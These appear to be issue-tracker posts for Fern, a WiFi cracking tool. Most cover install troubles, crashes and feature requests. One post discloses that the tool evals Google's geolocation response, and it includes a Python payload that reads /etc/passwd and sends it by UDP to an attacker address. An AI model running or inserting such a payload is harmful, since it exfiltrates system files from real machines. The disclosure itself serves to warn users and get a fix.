Couldn't determine current channel for mon0, you should either force the

When i set the option --ignore-negative-one for aireply-ng works fine, also for
airodump-ng. Can you add the option in Source or make that configurable?
Thanks

I have emailed the following to the developer to give additional time to fix
the problem but I am posting it here as well so that other people can be warned
of the security vulnerability and upgrade their software when a patch is made
available.
----
The line of code at core/tracker_core.py line 43 introduces a
vulnerability into fern allowing people to hijack your connection to
Google's servers and respond with a payload to give access to a system.
For example, they might reply with the data:
__import__('socket').socket(__import__('socket').AF_INET,__import__('s
ocket').SOCK_DGRAM).sendto(open('/etc/passwd').read(),
('123.123.123.123', 15000))
This would cause the contents of /etc/passwd to be sent in a UDP packet
to a computer run by the attacker. Other options are possible and
because the tool is run often run as root, the attacker is given full
root access.
Passing an empty dictionary to eval as you do with self.save_eval is not
an effective means to stop the exploit.
Finally, on my last attempt, using the /loc/json page on Google's
servers failed. However, I suspect that you are attempting to parse the
JSON data by using eval(). You can import json to do this without
allowing code execution.

Now the wps pin crack method is very useful in crack wifi routers,so maybe a
new function like that can be added to our fern tools, that must be more popular.

passive mode was activated and it just listens for IVs and does not inject any
packets

hello! i've seen issue 34 but i still have a problem, so please if you can
help...
Wat steps will reproduce the problem?
1.wpa brutefosing encription hangs on larger wordlist, in my case wordlist im
using is 778 MiB it is optimized and it passes when i use it on cmd line,
xterm is on and it shuts down when bruteforcing starts, sadly my mistake is i
did not strated fern from cmd line, so i cant see the output.
I'm using kubuntu 12.04, latest kernel and latest fern, cpu intel b800 4G ram,
so it takes a long time for aircrack, as i saw i don't have problems with cmd
line or another similar program,
I guess something is wrong in my settings, list or something, everything else
seems to work fine, and if i may suggesst option for john, chrunch or pyrit
would be all that fern needs to be perfect. and perfect i think it is.
Any suggestions? Thing i wanna say is Great work, and i really apreaciate it.
Thank you
etigana

Hi guys, I'm running a nice fresh gentoo installation on one of my machines and
I'm busy setting up fern on it. The default python version was 3.2. Upon
executing execute.py, it threw an import error when loading in the commands
module. Shock and horror, upstream have been messing with the libraries again.
Apparently, you should be calling subprocess instead. Switching over to
python2.7 resolved that particular issue. Any chance you could look at
resolving this?

And evidence; and I echo many can not.
I tried with many versions of PyQt4 and nothing.
http://www.multiupload.com/OY09WZFI3E <--- python-qt4_4.4.2-4_i386.deb
http://www.multiupload.com/BU9NRE8GVG <--- python-qt4_4.4.2-4_i386.lzm
This is the last I've proven.
I can tell if it's good, or I could put a link PyQt4 valid file.

I hate to ask the noob question, but since there isn't really a guide on here,
could you or someone who has this working post a step-by-step guide to
installing?
I've tried on ubuntu 11.10, 12.04, 12.10, and can't get it to work. I do a
sudo apt-get install aircrack-ng phython python-qt4 macchanger.... etc, making
sure everything is installed. then I download the .deb, run it, it looks like
it installs, giving me an icon (doesn't show up in the recently installed list)
and then never runs. air-crack runs fine, at least without the compat library
on my dell vostro 3750 with intel centrino wireless N 1030 card, but this app
never runs.
What I'm hoping to see is a how-to, with exact release, version, commands etc.
i.e:
1.) downlad and install Ubuntu 11.x (32/64) / kubuntu/ etc.
2.) type "sudo apt-get install x y z"
3.) ??
4.) profit
I'm not a noob to linux, but theres a lack of error messages being generated
here, so I dont know whats failing.
Thanks!
